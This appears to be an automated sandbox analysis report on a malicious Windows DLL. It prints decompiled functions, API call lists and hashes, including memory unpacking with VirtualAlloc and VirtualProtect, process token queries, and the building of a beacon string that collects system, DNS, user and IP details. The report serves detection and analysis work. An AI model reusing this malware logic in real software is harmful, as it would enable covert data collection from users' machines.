                                                                                                                                  • API String ID: 1646373207-3999644925
                                                                                                                                  • Opcode ID: 347db5c7bb96f7463c550fbc5697d832adbf98cf92c6959a2a4cdad87c80d5d4
                                                                                                                                  • Instruction ID: 3d7858b4b9450a8eb02071abf1d6b594e0afeaeb2fcb98c35d574675c067e653
                                                                                                                                  • Opcode Fuzzy Hash: 347db5c7bb96f7463c550fbc5697d832adbf98cf92c6959a2a4cdad87c80d5d4
                                                                                                                                  • Instruction Fuzzy Hash: 10F0F97190230AEFDB19CBE9FD44BAA73ECEB19355B104059F801E7264E774EA02CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A32291, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A32291(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E00A375F6(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E00A34AAB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}





                                                                                                                                  0x00a3229a
                                                                                                                                  0x00a322a4
                                                                                                                                  0x00a322a8
                                                                                                                                  0x00a322b0
                                                                                                                                  0x00a322b4
                                                                                                                                  0x00a322c3
                                                                                                                                  0x00a322c8
                                                                                                                                  0x00a322c8
                                                                                                                                  0x00a322b4
                                                                                                                                  0x00a322cf

                                                                                                                                  APIs
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A31083,73797325), ref: 00A322A2
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A322BC
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                  • String ID: PGt
                                                                                                                                  • API String ID: 1564683301-293773470
                                                                                                                                  • Opcode ID: 438584540ce25ad539d31e482b0afaaa7caf9e26bccdb9eca85d28197a8726b9
                                                                                                                                  • Instruction ID: 588a3d6c25eb345f18ad2b9849979e8cbf9b36b4a933007c82f6f0f685a50b58
                                                                                                                                  • Opcode Fuzzy Hash: 438584540ce25ad539d31e482b0afaaa7caf9e26bccdb9eca85d28197a8726b9
                                                                                                                                  • Instruction Fuzzy Hash: 92E0BF326026326646325AEA5D44E9BDEADEFEAAF1B060125F909E2121DA11CC1293F5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31EC1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00A31EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00A375F6(_t2);
				if(_t34 != 0) {
					_t30 = E00A375F6(_t28);
					if(_t30 == 0) {
						E00A34AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00A3A971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00A3A971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                  0x00a31ec1
                                                                                                                                  0x00a31ecb
                                                                                                                                  0x00a31ecd
                                                                                                                                  0x00a31ed3
                                                                                                                                  0x00a31ed3
                                                                                                                                  0x00a31edc
                                                                                                                                  0x00a31ee0
                                                                                                                                  0x00a31eec
                                                                                                                                  0x00a31ef0
                                                                                                                                  0x00a31f64
                                                                                                                                  0x00a31ef2
                                                                                                                                  0x00a31ef2
                                                                                                                                  0x00a31ef6
                                                                                                                                  0x00a31efb
                                                                                                                                  0x00a31f00
                                                                                                                                  0x00a31f1a
                                                                                                                                  0x00a31f09
                                                                                                                                  0x00a31f09
                                                                                                                                  0x00a31f0d
                                                                                                                                  0x00a31f10
                                                                                                                                  0x00a31f15
                                                                                                                                  0x00a31f15
                                                                                                                                  0x00a31f1f
                                                                                                                                  0x00a31f47
                                                                                                                                  0x00a31f4d
                                                                                                                                  0x00a31f50
                                                                                                                                  0x00a31f21
                                                                                                                                  0x00a31f23
                                                                                                                                  0x00a31f2b
                                                                                                                                  0x00a31f36
                                                                                                                                  0x00a31f3b
                                                                                                                                  0x00a31f3b
                                                                                                                                  0x00a31f57
                                                                                                                                  0x00a31f5e
                                                                                                                                  0x00a31f5f
                                                                                                                                  0x00a31f5f
                                                                                                                                  0x00a31ef0
                                                                                                                                  0x00a31f6f

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A35405,00000000,00000000,74E481D0,033A9618,?,?,00A32A8A,?,033A9618), ref: 00A31ECD
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                    • Part of subcall function 00A3A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A31EFB,00000000,00000001,00000001,?,?,00A35405,00000000,00000000,74E481D0,033A9618), ref: 00A3A97F
                                                                                                                                    • Part of subcall function 00A3A971: StrChrA.SHLWAPI(?,0000003F,?,?,00A35405,00000000,00000000,74E481D0,033A9618,?,?,00A32A8A,?,033A9618,0000EA60,?), ref: 00A3A989
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A35405,00000000,00000000,74E481D0,033A9618,?,?,00A32A8A), ref: 00A31F2B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,74E481D0), ref: 00A31F3B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00A31F47
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3767559652-0
                                                                                                                                  • Opcode ID: b0961fa2471316622304040599a6f219b52b7d26d81b828aa4595eab5c1a95d3
                                                                                                                                  • Instruction ID: 2c0dc8cc1b5631f5743dc56761755068adb0903d695ad02b3c393f77f136bfbf
                                                                                                                                  • Opcode Fuzzy Hash: b0961fa2471316622304040599a6f219b52b7d26d81b828aa4595eab5c1a95d3
                                                                                                                                  • Instruction Fuzzy Hash: 8B21B172508295EFCB129FB8CD44BAE7FB8EF06390F158056F904AB212D731C9018BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3131E, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00A375F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                  0x00a31333
                                                                                                                                  0x00a31337
                                                                                                                                  0x00a31341
                                                                                                                                  0x00a31346
                                                                                                                                  0x00a3134b
                                                                                                                                  0x00a3134d
                                                                                                                                  0x00a31355
                                                                                                                                  0x00a3135a
                                                                                                                                  0x00a31368
                                                                                                                                  0x00a3136d
                                                                                                                                  0x00a31377

                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,033A9364,?,00A350AD,004F0053,033A9364,?,?,?,?,?,?,00A354EF), ref: 00A3132E
                                                                                                                                  • lstrlenW.KERNEL32(00A350AD,?,00A350AD,004F0053,033A9364,?,?,?,?,?,?,00A354EF), ref: 00A31335
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,00A350AD,004F0053,033A9364,?,?,?,?,?,?,00A354EF), ref: 00A31355
                                                                                                                                  • memcpy.NTDLL(74E069A0,00A350AD,00000002,00000000,004F0053,74E069A0,?,?,00A350AD,004F0053,033A9364), ref: 00A31368
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2411391700-0
                                                                                                                                  • Opcode ID: 0f323d121559af59ea0052a349beb4621b6da2fd72389692f13769d67c7a303b
                                                                                                                                  • Instruction ID: 70ee1cefa0cdeeba9c9835588cac17e160405e51a2247d8dc8fd591a9dfb6fff
                                                                                                                                  • Opcode Fuzzy Hash: 0f323d121559af59ea0052a349beb4621b6da2fd72389692f13769d67c7a303b
                                                                                                                                  • Instruction Fuzzy Hash: 48F0E776900119BBCB11EBA9CD85C9F7BACEF49394B154462FD04D7212E631EA149BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A338CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(033A9B10,00000000,00000000,7691C740,00A3467E,00000000), ref: 00A338DA
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00A338E2
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • lstrcpy.KERNEL32(00000000,033A9B10), ref: 00A338F6
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00A33901
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 74227042-0
                                                                                                                                  • Opcode ID: 0ac38efdc2f57596b39763df1db9d97ea1418d18a4e324c8f04027da1f7c1180
                                                                                                                                  • Instruction ID: 00e6bda94c7ecacb81930b427208f50a84a3ec24a422c3368af447e09ec69f2c
                                                                                                                                  • Opcode Fuzzy Hash: 0ac38efdc2f57596b39763df1db9d97ea1418d18a4e324c8f04027da1f7c1180
                                                                                                                                  • Instruction Fuzzy Hash: 4FE09273501260E7C711DBE8AD48C5FFBACEF8A7617040416F600E3111C720C9028BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Analysis Process: rundll32.exe PID: 4432 Parent PID: 5724 rundll32.exeCOMMON

                                                                                                                                  Executed Functions

                                                                                                                                  Function 6E97DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6E97DA28), ref: 6E97E097
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E97DA88), ref: 6E97E0CE
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E97E12E
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E164
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00000000,00000004,6E97DFB9), ref: 6E97E269
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00001000,00000004,6E97DFB9), ref: 6E97E290
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9), ref: 6E97E35D
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9,?), ref: 6E97E3B3
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E3CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.684052741.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                  • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction ID: 1532731c19047ecb8d8048b55b1c182ca6af44890a261f2af2e2ca0a8a368f86
                                                                                                                                  • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction Fuzzy Hash: 4FD17C725206219FDB22CF54CC80A9237E7FF49B91F0841A8ED4A9F34AD370AA05CF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A5D10, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                  			E031A5D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E031A75F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E031A4AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                  0x031a5d1d
                                                                                                                                  0x031a5d1e
                                                                                                                                  0x031a5d1f
                                                                                                                                  0x031a5d20
                                                                                                                                  0x031a5d21
                                                                                                                                  0x031a5d25
                                                                                                                                  0x031a5d2c
                                                                                                                                  0x031a5d3b
                                                                                                                                  0x031a5d3e
                                                                                                                                  0x031a5d41
                                                                                                                                  0x031a5d48
                                                                                                                                  0x031a5d4b
                                                                                                                                  0x031a5d4e
                                                                                                                                  0x031a5d51
                                                                                                                                  0x031a5d54
                                                                                                                                  0x031a5d5f
                                                                                                                                  0x031a5d61
                                                                                                                                  0x031a5d6a
                                                                                                                                  0x031a5d72
                                                                                                                                  0x031a5d74
                                                                                                                                  0x031a5d86
                                                                                                                                  0x031a5d90
                                                                                                                                  0x031a5d94
                                                                                                                                  0x031a5da3
                                                                                                                                  0x031a5da7
                                                                                                                                  0x031a5db0
                                                                                                                                  0x031a5db8
                                                                                                                                  0x031a5db8
                                                                                                                                  0x031a5dba
                                                                                                                                  0x031a5dba
                                                                                                                                  0x031a5dc2
                                                                                                                                  0x031a5dc8
                                                                                                                                  0x031a5dcc
                                                                                                                                  0x031a5dcc
                                                                                                                                  0x031a5dd7

                                                                                                                                  APIs
                                                                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 031A5D57
                                                                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 031A5D6A
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031A5D86
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 031A5DA3
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 031A5DB0
                                                                                                                                  • NtClose.NTDLL(?), ref: 031A5DC2
                                                                                                                                  • NtClose.NTDLL(00000000), ref: 031A5DCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2575439697-0
                                                                                                                                  • Opcode ID: 49dacff5c32c12afe571e09f73e91ce53b8a1504d686203820d4604c33ca95da
                                                                                                                                  • Instruction ID: f1139219ee630f8d82bd91133350643e09feae025f4bdcd5df15a67124c595f9
                                                                                                                                  • Opcode Fuzzy Hash: 49dacff5c32c12afe571e09f73e91ce53b8a1504d686203820d4604c33ca95da
                                                                                                                                  • Instruction Fuzzy Hash: 3B21F6BAA00618BBDB01EF99CC459DEBFBAEB0C751F104026F901E6110D7719A559BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8E5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E8E5696
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97B7A0,000008BB), ref: 6E8E576F
                                                                                                                                    • Part of subcall function 6E8E72B0: task.LIBCPMTD ref: 6E8E7352
                                                                                                                                    • Part of subcall function 6E8EBA20: swap.LIBCPMTD ref: 6E8EBA39
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E967144,?,?,?,?,?,00000000), ref: 6E8E5950
                                                                                                                                  • std::locale::locale.LIBCPMTD ref: 6E8E59D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 756721536-1684325040
                                                                                                                                  • Opcode ID: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction ID: 4548c44c63027359671f4cf293aaa57d58b060eb914cd35c51bf336499526202
                                                                                                                                  • Opcode Fuzzy Hash: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction Fuzzy Hash: 7F524EF0A08624CFCF08CFA9D990AA977B6FF8B305F108929D54597794D7B8984DCB44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A44A4, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                  			E031A44A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x31ad018; // 0x53709a90
				asm("bswap eax");
				_t27 =  *0x31ad014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x31ad010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x31ad00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x31ad2e0; // 0x2a2a5a8
				_t3 = _t30 + 0x31ae633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x31ad02c,  *0x31ad004, _t25);
				_t33 = E031A5B60();
				_t34 =  *0x31ad2e0; // 0x2a2a5a8
				_t4 = _t34 + 0x31ae673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E031A1BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x31ad2e0; // 0x2a2a5a8
					_t6 = _t83 + 0x31ae8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x31ad270, 0, _t96);
				}
				_t97 = E031A137A();
				if(_t97 != 0) {
					_t78 =  *0x31ad2e0; // 0x2a2a5a8
					_t8 = _t78 + 0x31ae8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x31ad270, 0, _t97);
				}
				_t98 =  *0x31ad364; // 0x5bd95b0
				_a32 = E031A3857(0x31ad00a, _t98 + 4);
				_t42 =  *0x31ad308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x31ad2e0; // 0x2a2a5a8
					_t11 = _t74 + 0x31ae8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x31ad304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x31ad2e0; // 0x2a2a5a8
					_t13 = _t71 + 0x31ae885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0x31ad270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E031AA811(GetTickCount());
						_t50 =  *0x31ad364; // 0x5bd95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x31ad364; // 0x5bd95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x31ad364; // 0x5bd95b0
						_t103 = E031A1974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x31ac2ac);
							_push(_t103);
							_t62 = E031A38CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E031A2A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E031A47D5();
								}
								HeapFree( *0x31ad270, 0, _v44);
							}
							HeapFree( *0x31ad270, 0, _t103);
						}
						RtlFreeHeap( *0x31ad270, 0, _t100); // executed
					}
					HeapFree( *0x31ad270, 0, _a24);
				}
				RtlFreeHeap( *0x31ad270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                                                  0x031a44a4
                                                                                                                                  0x031a44a4
                                                                                                                                  0x031a44a4
                                                                                                                                  0x031a44a9
                                                                                                                                  0x031a44af
                                                                                                                                  0x031a44b9
                                                                                                                                  0x031a44bb
                                                                                                                                  0x031a44bb
                                                                                                                                  0x031a44c8
                                                                                                                                  0x031a44d3
                                                                                                                                  0x031a44d6
                                                                                                                                  0x031a44e1
                                                                                                                                  0x031a44e4
                                                                                                                                  0x031a44e9
                                                                                                                                  0x031a44ec
                                                                                                                                  0x031a44f1
                                                                                                                                  0x031a44f4
                                                                                                                                  0x031a4500
                                                                                                                                  0x031a450d
                                                                                                                                  0x031a450f
                                                                                                                                  0x031a4515
                                                                                                                                  0x031a451a
                                                                                                                                  0x031a4525
                                                                                                                                  0x031a4527
                                                                                                                                  0x031a452a
                                                                                                                                  0x031a452c
                                                                                                                                  0x031a4531
                                                                                                                                  0x031a4535
                                                                                                                                  0x031a4537
                                                                                                                                  0x031a453c
                                                                                                                                  0x031a4548
                                                                                                                                  0x031a454a
                                                                                                                                  0x031a4556
                                                                                                                                  0x031a4558
                                                                                                                                  0x031a4558
                                                                                                                                  0x031a4563
                                                                                                                                  0x031a4567
                                                                                                                                  0x031a4569
                                                                                                                                  0x031a456e
                                                                                                                                  0x031a457a
                                                                                                                                  0x031a457c
                                                                                                                                  0x031a4588
                                                                                                                                  0x031a458a
                                                                                                                                  0x031a458a
                                                                                                                                  0x031a4590
                                                                                                                                  0x031a45a3
                                                                                                                                  0x031a45a7
                                                                                                                                  0x031a45ae
                                                                                                                                  0x031a45b1
                                                                                                                                  0x031a45b6
                                                                                                                                  0x031a45c1
                                                                                                                                  0x031a45c3
                                                                                                                                  0x031a45c6
                                                                                                                                  0x031a45c6
                                                                                                                                  0x031a45c8
                                                                                                                                  0x031a45cf
                                                                                                                                  0x031a45d2
                                                                                                                                  0x031a45d7
                                                                                                                                  0x031a45e1
